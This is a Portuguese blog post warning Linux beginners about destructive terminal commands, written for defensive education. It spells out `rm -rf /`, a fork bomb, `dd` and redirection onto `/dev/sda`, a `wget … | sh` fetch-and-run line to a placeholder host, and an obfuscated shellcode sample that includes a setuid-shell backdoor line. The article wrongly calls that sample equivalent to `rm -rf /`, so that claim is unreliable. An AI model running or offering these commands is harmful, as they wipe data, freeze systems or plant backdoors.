Como o número de usuários leigos de Linux vem aumentando com o tempo, acho pertinente alertar as pessoas sobre alguns comandos que podem ser perigosos, tanto para o sistema, quanto para os dados contidos no computador.
O terminal é uma ferramenta muito poderosa, por conta disso é bom você dominá-lo, ou pelo menos entendê-lo, para evitar problemas no seu sistema baseado em Linux.
Veja também: Curso Dominando o Terminal
Os grandes problemas que você pode enfrentar usando o terminal de forma indiscriminada normalmente estão atrelados a comandos de sobrescrita de dados, então vamos mostrar alguns aqui que você deve prestar especial atenção quando vir alguém sugerindo que você faça no seu computador com Linux.
Atenção: Você NÃO deve executar nenhum destes comandos no seu computador, isso pode causar danos irreversíveis que nós não nos responsabilizamos, o artigo tem a intenção de ser instrutivo, justamente para evitar este tipo de situação.
1 – rm -rf
É um comando clássico do do Linux que teoricamente não faz nada de mais, ele serve apenas para apagar arquivos, e é aí que mora o perigo. Dependendo da forma que ele for aplicativo o resultado pode ser muito desagradável, por isso é importante você entender o que os comandos fazem, vamos explicar um pouco melhor neste exemplo:
– rm: comando usado no Linux para deletar arquivos.
– rm -r: o comando deleta pastas recursivamente, mesmo que a pastas esteja vazia.
– rm -f: Usando este parâmetro, o propriedade de “apenas leitura” que um arquivo tenha é removida sem perguntar, permitindo que o arquivo seja apagado.
– rm -rf / : Usando a combinação dos dois parâmetros com a “/” você diz para o sistema apagar tudo que está no diretório raiz do sistema.
– rm -rf * : Força o apagamento de tudo que está no diretório atual ou no de trabalho, dependendo de onde você estiver.
– rm -rf . : Acrescentando um ponto, você pode apagar também as pastas ocultas, além das normais.
Tome muito cuidado ao executar um comando destes, especialmente se for feito como root ou usando o sudo.
Tão perigoso que pode ser este comando, que atualmente o Linux se protege contra ele, se você rodá-lo, mesmo com sudo ou como root, ele não vai funcionar, para isso é preciso usar os parâmetros descritos na imagem acima. Da mesma forma que o Linux protege você de destruir o sistema sem querer, ele também permite que você o destrua mediante a ter certeza de que é realmente isso que você quer, curioso, não é?
2 – :(){:|:&};:
Este comando funciona como uma “Fork Bomb”, ele opera definindo uma função chamada ‘:’, que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano, o processo se repete indefinidamente até que o sistema trave.
3 – qualquer comando para > /dev/sda
A forma com que o Linux lê as partições e discos é diferente do Windows, por conta disso, normalmente novatos não conseguem entender em primeira instância como eles são distribuídos. Normalmente a localização dos dispositivos de armazenamento do sistema ficam dentro de /dev, sendo que podem haver vários por ali e normalmente o sda está presente.
O problema do comando acima é que ele redireciona a saída de qualquer comando que seja colocado para o seu bloco de armazenamento, desta foma sobrescrevendo alguns dados e corrompendo outros.
4 – mv pasta/diretório /dev/null
Eu costumava brincar sobre o /dev/null me referindo a ele como o “buraco negro” do Linux. Tudo que é enviado para ele é perdido “para sempre”. Então tome cuidado ao mover qualquer coisa para esta localização. O comando mv serve para mover arquivos ou diretórios para o destino indicado, se este destino for o /dev/null você estará mandando seus arquivos pra Nárnia.
5 – wget http://malicious_source -O- | sh
Este comando vai aparecer para você instalar alguns programas. O wget é o programa responsável por fazer o download da URL que vem logo após, ele é bem útil para baixar arquivos em geral, o problema está no arquivo que ele baixa e na sequência do comando que o executa no caso dele ser um shell script. Só baixe arquivos desta forma de fontes que você considera confiáveis e se estiver na dúvida, baixe apenas o arquivo de shell, eliminando qualquer parâmetro que apareça após o link, assim você pode abrir ele em um editor de texto de sua preferência e verificar o que há dentro dele.
6 – dd if=/dev/random of=/dev/sda
Assim como o ítem 3 da nossa lista, o grande problema aqui é o destino ser o /dev/sda. Tome cuidado. O comando dd pode ser muito útil para copiar arquivos e até mesmo partições inteiras, como no exemplo 6, mas se a saída for um outro disco, tome cuidado, pois o resultado irá sobrepor os dados lá existentes.
7 – Comandos disfarçados
Como eu comentei à princípio, o terminal é uma ferramenta poderosa, se você não dominá-lo, é bom ter cuidado com que você for rodar nele, se o você não fala a língua do terminal, saiba que ele fala muitas outras. O comando abaixo nada mais é do que o comando indicado no primeiro item da nossa lista, só que em forma hexadecimal.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;Ele tem o mesmo propósito do famigerado “rm -rf /”, por isso, não rode coisas no terminal que você não sabe para quem servem, existem muito conteúdo grátis a internet para você estudar sobre e até mesmo alguns bons cursos pagos, como é o caso do “Dominando o Terminal” aqui do blog mesmo, mas em linhas gerais, se você evitar colocar comandos que você não sabe para que servem direito, os problemas já serão minimizados.
Agora espalhe este conhecimento para ajudar mais pessoas a ficarem precavidas sobre estes pequenos percalços da vida computacional.
Até a próxima!
